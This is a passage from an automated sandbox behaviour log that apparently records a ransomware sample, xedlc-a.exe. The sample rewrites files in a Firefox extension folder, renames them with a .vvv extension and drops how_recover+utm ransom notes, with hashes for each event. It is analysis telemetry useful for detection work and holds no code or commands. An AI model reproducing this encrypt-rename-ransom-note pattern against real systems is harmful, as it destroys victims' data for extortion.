52593.          ntstatus: 0x0
52594.          CreateOptions: 0x60
52595.        file:
52596.          timestamp: 77965
52597.          mode: close
52598.          sequenceNumber: 1144
52599.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cortex.js
52600.          filesize: 6622
52601.          md5sum: b6ccf77967b01a964fda25000f2b3d50
52602.          sha1sum: 4f34980b784237ccedf8e23befd4d60cd9a41030
52603.          processinfo:
52604.            pid: 1056
52605.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52606.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52607.            ads:
52608.          fid (ads:): 562949953476271
52609.          ntstatus: 0x0
52610.          CreateOptions: 0x0
52611.        file:
52612.          timestamp: 77978
52613.          mode: rename
52614.          sequenceNumber: 1145
52615.          filesize: 6622
52616.          md5sum: b6ccf77967b01a964fda25000f2b3d50
52617.          sha1sum: 4f34980b784237ccedf8e23befd4d60cd9a41030
52618.          processinfo:
52619.            pid: 1056
52620.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52621.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52622.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cortex.js
52623.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cortex.js.vvv
52624.            ads:
52625.          fid (ads:): 562949953476271
52626.          ntstatus: 0x0
52627.          CreateOptions: 0x0
52628.        file:
52629.          timestamp: 78026
52630.          mode: open
52631.          sequenceNumber: 1146
52632.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cuddlefish.js
52633.          filesize: 6789
52634.          processinfo:
52635.            pid: 1056
52636.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52637.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52638.            ads:
52639.          fid (ads:): 281474976765895
52640.          ntstatus: 0x0
52641.          CreateOptions: 0x60
52642.        file:
52643.          timestamp: 78076
52644.          mode: close
52645.          sequenceNumber: 1147
52646.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cuddlefish.js
52647.          filesize: 7214
52648.          md5sum: b768afb4af1e34de139ec93d8838a2c2
52649.          sha1sum: c5bb09ec199e23a122e716c90cce7c9845867d0c
52650.          processinfo:
52651.            pid: 1056
52652.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52653.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52654.            ads:
52655.          fid (ads:): 281474976765895
52656.          ntstatus: 0x0
52657.          CreateOptions: 0x0
52658.        file:
52659.          timestamp: 78095
52660.          mode: rename
52661.          sequenceNumber: 1148
52662.          filesize: 7214
52663.          md5sum: b768afb4af1e34de139ec93d8838a2c2
52664.          sha1sum: c5bb09ec199e23a122e716c90cce7c9845867d0c
52665.          processinfo:
52666.            pid: 1056
52667.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52668.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52669.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cuddlefish.js
52670.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cuddlefish.js.vvv
52671.            ads:
52672.          fid (ads:): 281474976765895
52673.          ntstatus: 0x0
52674.          CreateOptions: 0x0
52675.        file:
52676.          timestamp: 78109
52677.          mode: open
52678.          sequenceNumber: 1149
52679.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\keys.js
52680.          filesize: 3285
52681.          processinfo:
52682.            pid: 1056
52683.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52684.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52685.            ads:
52686.          fid (ads:): 281474976765871
52687.          ntstatus: 0x0
52688.          CreateOptions: 0x60
52689.        file:
52690.          timestamp: 78119
52691.          mode: close
52692.          sequenceNumber: 1150
52693.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\keys.js
52694.          filesize: 3710
52695.          md5sum: 59b75d30995380b7282a509563e00d0e
52696.          sha1sum: 00760ff5ef459a2a177885ca4edaa27e0f242815
52697.          processinfo:
52698.            pid: 1056
52699.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52700.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52701.            ads:
52702.          fid (ads:): 281474976765871
52703.          ntstatus: 0x0
52704.          CreateOptions: 0x0
52705.        file:
52706.          timestamp: 78131
52707.          mode: rename
52708.          sequenceNumber: 1151
52709.          filesize: 3710
52710.          md5sum: 59b75d30995380b7282a509563e00d0e
52711.          sha1sum: 00760ff5ef459a2a177885ca4edaa27e0f242815
52712.          processinfo:
52713.            pid: 1056
52714.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52715.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52716.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\keys.js
52717.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\keys.js.vvv
52718.            ads:
52719.          fid (ads:): 281474976765871
52720.          ntstatus: 0x0
52721.          CreateOptions: 0x0
52722.        file:
52723.          timestamp: 78143
52724.          mode: created
52725.          sequenceNumber: 1152
52726.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\how_recover+utm.txt
52727.          processinfo:
52728.            pid: 1056
52729.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52730.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52731.            ads:
52732.          fid (ads:): 281474976778339
52733.          ntstatus: 0x0
52734.          CreateOptions: 0x60
52735.        file:
52736.          timestamp: 78152
52737.          mode: close
52738.          sequenceNumber: 1153
52739.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\how_recover+utm.txt
52740.          filesize: 2682
52741.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
52742.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
52743.          processinfo:
52744.            pid: 1056
52745.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52746.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52747.            ads:
52748.          fid (ads:): 281474976778339
52749.          ntstatus: 0x0
52750.          CreateOptions: 0x0
52751.        file:
52752.          timestamp: 78162
52753.          mode: created
52754.          sequenceNumber: 1154
52755.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\how_recover+utm.html
52756.          processinfo:
52757.            pid: 1056
52758.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52759.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52760.            ads:
52761.          fid (ads:): 281474976778340
52762.          ntstatus: 0x0
52763.          CreateOptions: 0x60
52764.        file:
52765.          timestamp: 78170
52766.          mode: close
52767.          sequenceNumber: 1155
52768.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events\how_recover+utm.html
52769.          filesize: 9495
52770.          md5sum: 95f596a25dff51b6af2042b1bbe02985
52771.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
52772.          processinfo:
52773.            pid: 1056
52774.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52775.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52776.            ads:
52777.          fid (ads:): 281474976778340
52778.          ntstatus: 0x0
52779.          CreateOptions: 0x0
52780.        file:
52781.          timestamp: 78179
52782.          mode: open
52783.          sequenceNumber: 1156
52784.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events.js
52785.          filesize: 7418
52786.          processinfo:
52787.            pid: 1056
52788.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52789.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52790.            ads:
52791.          fid (ads:): 562949953476249
52792.          ntstatus: 0x0
52793.          CreateOptions: 0x60
52794.        file:
52795.          timestamp: 78218
52796.          mode: close
52797.          sequenceNumber: 1157
52798.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events.js
52799.          filesize: 7838
52800.          md5sum: 9cc309b952ea46cb038f3c9d53c4d319
52801.          sha1sum: a42b43345cb33e28a231bbbb58f9349521c5352f
52802.          processinfo:
52803.            pid: 1056
52804.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52805.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52806.            ads:
52807.          fid (ads:): 562949953476249
52808.          ntstatus: 0x0
52809.          CreateOptions: 0x0
52810.        file:
52811.          timestamp: 78240
52812.          mode: rename
52813.          sequenceNumber: 1158
52814.          filesize: 7838
52815.          md5sum: 9cc309b952ea46cb038f3c9d53c4d319
52816.          sha1sum: a42b43345cb33e28a231bbbb58f9349521c5352f
52817.          processinfo:
52818.            pid: 1056
52819.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52820.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52821.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events.js
52822.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\events.js.vvv
52823.            ads:
52824.          fid (ads:): 562949953476249
52825.          ntstatus: 0x0
52826.          CreateOptions: 0x0
52827.        file:
52828.          timestamp: 78252
52829.          mode: created
52830.          sequenceNumber: 1159
52831.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\how_recover+utm.txt
52832.          processinfo:
52833.            pid: 1056
52834.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52835.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52836.            ads:
52837.          fid (ads:): 281474976778341
52838.          ntstatus: 0x0
52839.          CreateOptions: 0x60
52840.        file:
52841.          timestamp: 78260
52842.          mode: close
52843.          sequenceNumber: 1160
52844.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\how_recover+utm.txt
52845.          filesize: 2682
52846.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
52847.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
52848.          processinfo:
52849.            pid: 1056
52850.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52851.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52852.            ads:
52853.          fid (ads:): 281474976778341
52854.          ntstatus: 0x0
52855.          CreateOptions: 0x0
52856.        file:
52857.          timestamp: 78276
52858.          mode: created
52859.          sequenceNumber: 1161
52860.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\how_recover+utm.html
52861.          processinfo:
52862.            pid: 1056
52863.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52864.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52865.            ads:
52866.          fid (ads:): 281474976778342
52867.          ntstatus: 0x0
52868.          CreateOptions: 0x60
52869.        file:
52870.          timestamp: 78284
52871.          mode: close
52872.          sequenceNumber: 1162
52873.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom\how_recover+utm.html
52874.          filesize: 9495
52875.          md5sum: 95f596a25dff51b6af2042b1bbe02985
52876.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
52877.          processinfo:
52878.            pid: 1056
52879.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52880.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52881.            ads:
52882.          fid (ads:): 281474976778342
52883.          ntstatus: 0x0
52884.          CreateOptions: 0x0
52885.        file:
52886.          timestamp: 78294
52887.          mode: open
52888.          sequenceNumber: 1163
52889.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10s.js
52890.          filesize: 7984
52891.          processinfo:
52892.            pid: 1056
52893.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52894.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52895.            ads:
52896.          fid (ads:): 281474976765869
52897.          ntstatus: 0x0
52898.          CreateOptions: 0x60
52899.        file:
52900.          timestamp: 78379
52901.          mode: close
52902.          sequenceNumber: 1164
52903.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10s.js
52904.          filesize: 8414
52905.          md5sum: 7a97a0dc17a04c7f5980d4a91a5ae456
52906.          sha1sum: a63905590a442c878008dd57fc7cf083a2406c60
52907.          processinfo:
52908.            pid: 1056
52909.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52910.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52911.            ads:
52912.          fid (ads:): 281474976765869
52913.          ntstatus: 0x0
52914.          CreateOptions: 0x0
52915.        file:
52916.          timestamp: 78394
52917.          mode: rename
52918.          sequenceNumber: 1165
52919.          filesize: 8414
52920.          md5sum: 7a97a0dc17a04c7f5980d4a91a5ae456
52921.          sha1sum: a63905590a442c878008dd57fc7cf083a2406c60
52922.          processinfo:
52923.            pid: 1056
52924.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52925.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52926.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10s.js
52927.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10s.js.vvv
52928.            ads:
52929.          fid (ads:): 281474976765869
52930.          ntstatus: 0x0
52931.          CreateOptions: 0x0
52932.        file:
52933.          timestamp: 78406
52934.          mode: open
52935.          sequenceNumber: 1166
52936.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\errors.js
52937.          filesize: 3447
52938.          processinfo:
52939.            pid: 1056
52940.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52941.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52942.            ads:
52943.          fid (ads:): 281474976765917
52944.          ntstatus: 0x0
52945.          CreateOptions: 0x60
52946.        file:
52947.          timestamp: 78430
52948.          mode: close
52949.          sequenceNumber: 1167
52950.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\errors.js
52951.          filesize: 3870
52952.          md5sum: cafa912da202b50f99591b5ec498869c
52953.          sha1sum: 073d30bc5f15bb1ca6d477dc2cb4e807cf40fdc8
52954.          processinfo:
52955.            pid: 1056
52956.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52957.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52958.            ads:
52959.          fid (ads:): 281474976765917
52960.          ntstatus: 0x0
52961.          CreateOptions: 0x0
52962.        file:
52963.          timestamp: 78442
52964.          mode: rename
52965.          sequenceNumber: 1168
52966.          filesize: 3870
52967.          md5sum: cafa912da202b50f99591b5ec498869c
52968.          sha1sum: 073d30bc5f15bb1ca6d477dc2cb4e807cf40fdc8
52969.          processinfo:
52970.            pid: 1056
52971.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52972.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52973.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\errors.js
52974.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\errors.js.vvv
52975.            ads:
52976.          fid (ads:): 281474976765917
52977.          ntstatus: 0x0
52978.          CreateOptions: 0x0
52979.        file:
52980.          timestamp: 78455
52981.          mode: open
52982.          sequenceNumber: 1169
52983.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\assembler.js
52984.          filesize: 3456
52985.          processinfo:
52986.            pid: 1056
52987.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
52988.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
52989.            ads:
52990.          fid (ads:): 281474976765884
52991.          ntstatus: 0x0
52992.          CreateOptions: 0x60
52993.        file:
52994.          timestamp: 78511
52995.          mode: close
52996.          sequenceNumber: 1170
52997.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\assembler.js
52998.          filesize: 3886
52999.          md5sum: b2391e96ded857ed846a9be66a5ba832
53000.          sha1sum: 4e09f60eafd5d87d3be34b3706b5dccc0c5bcdf4
53001.          processinfo:
53002.            pid: 1056
53003.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53004.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53005.            ads:
53006.          fid (ads:): 281474976765884
53007.          ntstatus: 0x0
53008.          CreateOptions: 0x0
53009.        file:
53010.          timestamp: 78524
53011.          mode: rename
53012.          sequenceNumber: 1171
53013.          filesize: 3886
53014.          md5sum: b2391e96ded857ed846a9be66a5ba832
53015.          sha1sum: 4e09f60eafd5d87d3be34b3706b5dccc0c5bcdf4
53016.          processinfo:
53017.            pid: 1056
53018.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53019.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53020.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\assembler.js
53021.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\assembler.js.vvv
53022.            ads:
53023.          fid (ads:): 281474976765884
53024.          ntstatus: 0x0
53025.          CreateOptions: 0x0
53026.        file:
53027.          timestamp: 78535
53028.          mode: created
53029.          sequenceNumber: 1172
53030.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\how_recover+utm.txt
53031.          processinfo:
53032.            pid: 1056
53033.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53034.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53035.            ads:
53036.          fid (ads:): 281474976778343
53037.          ntstatus: 0x0
53038.          CreateOptions: 0x60
53039.        file:
53040.          timestamp: 78545
53041.          mode: close
53042.          sequenceNumber: 1173
53043.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\how_recover+utm.txt
53044.          filesize: 2682
53045.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
53046.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
53047.          processinfo:
53048.            pid: 1056
53049.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53050.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53051.            ads:
53052.          fid (ads:): 281474976778343
53053.          ntstatus: 0x0
53054.          CreateOptions: 0x0
53055.        apicall:
53056.          timestamp: 78551
53057.          repeat: 100
53058.          sequenceNumber: 1174
53059.          processinfo:
53060.            pid: 1056
53061.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53062.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53063.          dllname: kernel32.dll
53064.          apiname: Sleep
53065.          address: 0x0041ed5b
53066.        file:
53067.          timestamp: 78569
53068.          mode: created
53069.          sequenceNumber: 1175
53070.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\how_recover+utm.html
53071.          processinfo:
53072.            pid: 1056
53073.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53074.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53075.            ads:
53076.          fid (ads:): 281474976778344
53077.          ntstatus: 0x0
53078.          CreateOptions: 0x60
53079.        file:
53080.          timestamp: 78577
53081.          mode: close
53082.          sequenceNumber: 1176
53083.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\how_recover+utm.html
53084.          filesize: 9495
53085.          md5sum: 95f596a25dff51b6af2042b1bbe02985
53086.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
53087.          processinfo:
53088.            pid: 1056
53089.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53090.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53091.            ads:
53092.          fid (ads:): 281474976778344
53093.          ntstatus: 0x0
53094.          CreateOptions: 0x0
53095.        file:
53096.          timestamp: 78587
53097.          mode: open
53098.          sequenceNumber: 1177
53099.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events.js
53100.          filesize: 7598
53101.          processinfo:
53102.            pid: 1056
53103.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53104.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53105.            ads:
53106.          fid (ads:): 281474976765918
53107.          ntstatus: 0x0
53108.          CreateOptions: 0x60
53109.        file:
53110.          timestamp: 78633
53111.          mode: close
53112.          sequenceNumber: 1178
53113.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events.js
53114.          filesize: 8014
53115.          md5sum: ddb7e376f8af080162a6866e713915fe
53116.          sha1sum: d22fc492d2daa708378cc45fc7cf3233742524f1
53117.          processinfo:
53118.            pid: 1056
53119.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53120.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53121.            ads:
53122.          fid (ads:): 281474976765918
53123.          ntstatus: 0x0
53124.          CreateOptions: 0x0
53125.        file:
53126.          timestamp: 78646
53127.          mode: rename
53128.          sequenceNumber: 1179
53129.          filesize: 8014
53130.          md5sum: ddb7e376f8af080162a6866e713915fe
53131.          sha1sum: d22fc492d2daa708378cc45fc7cf3233742524f1
53132.          processinfo:
53133.            pid: 1056
53134.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53135.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53136.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events.js
53137.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events.js.vvv
53138.            ads:
53139.          fid (ads:): 281474976765918
53140.          ntstatus: 0x0
53141.          CreateOptions: 0x0
53142.        file:
53143.          timestamp: 78658
53144.          mode: open
53145.          sequenceNumber: 1180
53146.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\file.js
53147.          filesize: 6618
53148.          processinfo:
53149.            pid: 1056
53150.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
53151.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
53152.            ads:
53153.          fid (ads:): 562949953476262
53154.          ntstatus: 0x0
53155.          CreateOptions: 0x60
53156.        file:
53157.          timestamp: 78710
53158.          mode: close
